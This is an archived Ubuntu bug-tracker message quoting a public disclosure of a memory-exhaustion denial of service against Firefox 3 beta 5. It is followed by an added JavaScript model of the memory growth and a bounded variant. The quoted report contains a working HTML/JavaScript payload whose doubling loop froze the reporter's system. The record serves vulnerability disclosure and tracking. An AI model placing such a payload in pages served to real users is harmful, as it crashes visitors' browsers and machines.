[Bug 220339] [NEW] Firefox 3b5 remote DoS using JavaScript

Alexander Konovalenko alexkon at gmail.com
Mon Apr 21 19:06:15 UTC 2008


*** This bug is a security vulnerability ***

Public security bug reported:

Binary package hint: firefox-3.0

From http://own-the.net/news_Firefox-3b5-on-Ubuntu-(DoS)_15.html
(via Full Disclosure), reported by K-Gen:

"I'll be honest, I was very surprised by this find. Very surprised. As a
matter of fact, this was the first time I ever managed to crash Linux
completely... Through a web browser.

The attack is too simple to brag about, just a simple JS that takes up a
lot of memory fast.

<html>
<body>
	<form method = "GET" action = "bla">
		<input name = "vuln" value = "012345678901234567890123456789012345678901234567890123456789">
	</form>

	<script>
		for (i=0; i<=5000; i++){
			document.forms[0].vuln.value += document.forms[0].vuln.value;
		}
	</script>

</body>
</html>

This algorithm takes M*2^N bytes of memory (where M is the length of the
"vuln" field and N is the number of loop iterations). You would expect
the browser to alert you that this script is going to take a really long
time to execute, but apparently, this doesn't happen.

After one second of this script running, Firefox stopped responding, a
few seconds later I couldn't even launch the Force Quit applet, a few
seconds after that the system reached a screeching halt.

I have a vague idea of how this is possible, but I guess this is related
to the new GTK+ forms in FF 3. I ran this script on Windows in Firefox
2, and nothing too scary happened. It did take up 1GB of memory in 5
seconds, but as it appeared, some limit was reached and the page was
loaded with nothing more exciting than a blank text field. The same
happened with IE 6.

Note, however, that the Windows machine had twice as much RAM and
processing power as the Linux machine, so I'm not sure whether this was
a very "scientific" test. (I should also try installing FF 3 for Windows
and see what happens).

Certainly, I know FF 3 is beta software. However, what really shocked me
here is how easy it was to overload the whole system through a web page.
This certainly isn't "expected behavior"."
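As an added illustration (not part of the report quoted above nor of the Ubuntu bug), the growth of the doubling loop modelled in JavaScript together with the kind of byte budget that apparently stopped the page in Firefox 2 and IE 6; the UTF-16 cost of two bytes per character and the 1 MiB budget are assumptions made here:

```javascript
// Added example, not code from the report. Models the doubling loop's memory
// use and shows a bounded variant that stops at a byte budget instead of
// exhausting the machine. Assumed: JS strings are UTF-16, 2 bytes per char.

const BYTES_PER_CHAR = 2;

// Bytes held by the field after n doublings of an m-character seed: m * 2^n
// characters, times the per-character cost.
function projectedBytes(m, n) {
  return m * BYTES_PER_CHAR * 2 ** n;
}

// Largest number of doublings for which the field still fits in maxBytes.
function maxSafeIterations(m, maxBytes) {
  let n = 0;
  while (projectedBytes(m, n + 1) <= maxBytes) n++;
  return n;
}

// Bounded version of the report's loop: doubles `value` at most `iterations`
// times but stops as soon as the next doubling would exceed the budget.
// Returns the final value and how many doublings actually ran.
function boundedDoubling(seed, iterations, maxBytes) {
  let value = seed;
  let done = 0;
  for (let i = 0; i < iterations; i++) {
    // Size after one more doubling: current chars * 2, in bytes.
    if (value.length * 2 * BYTES_PER_CHAR > maxBytes) break;
    value += value;
    done++;
  }
  return { value, done };
}

// Constructed inputs: the report's 60-character seed and an assumed 1 MiB cap.
const SEED = "012345678901234567890123456789012345678901234567890123456789";
const ONE_MIB = 1024 * 1024;
```

With the 1 MiB cap the loop halts after 13 doublings (about 960 KiB), whereas the unbounded loop in the report keeps doubling for thousands of iterations.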

** Affects: firefox-3.0 (Ubuntu)
     Importance: Undecided
         Status: New

** Visibility changed to: Public

-- 
Firefox 3b5 remote DoS using JavaScript
https://bugs.launchpad.net/bugs/220339